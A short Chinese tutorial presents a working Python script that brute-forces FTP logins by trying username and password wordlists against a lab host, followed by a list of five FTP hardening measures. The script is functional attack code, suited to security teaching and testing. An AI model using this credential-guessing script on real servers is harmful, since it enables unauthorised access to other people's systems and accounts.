本篇是關於ftp的爆破實現。ftp爆破實現原理非常簡單,利用ftplib組件,通過讀取字典表username及password逐一嘗試登錄。
一、源代碼
#-*- coding:utf8 -*-
import ftplib
def crackhandle(host,username,password):
try:
ftp = ftplib.FTP(host);
ftp.login(username,password);
ftp.quit();
return True;
except Exception as e:
print("login fail! username is %s password is %s" % (username,password));
pass;
def crack():
host ="192.168.1.108";
passwordsList = open("/root/Desktop/pythonTest/password.txt");
usernamesList = open("/root/Desktop/pythonTest/username.txt");
passwords = passwordsList.readlines();
usernames = usernamesList.readlines();
switch = False;
for usuername in usernames:
username = usuername.strip();
for password in passwords:
password = password.strip();
recv = crackhandle(host,str(username),str(password));
if recv:
print("success userName is %s password is %s" % (username,password));
switch = True;
break;
if switch:
break;
crack();
運行指令:python ftpcrack.py
效果圖如下,可見通過爆破成功。
二、關於ftp的安全提升
1.從本地安全策略進行登錄錯誤設置;
2.使用SSL加密;
3.用戶權限設置合理化;
4.用戶名及密碼避免簡單化;
5.匿名訪問按需開啓;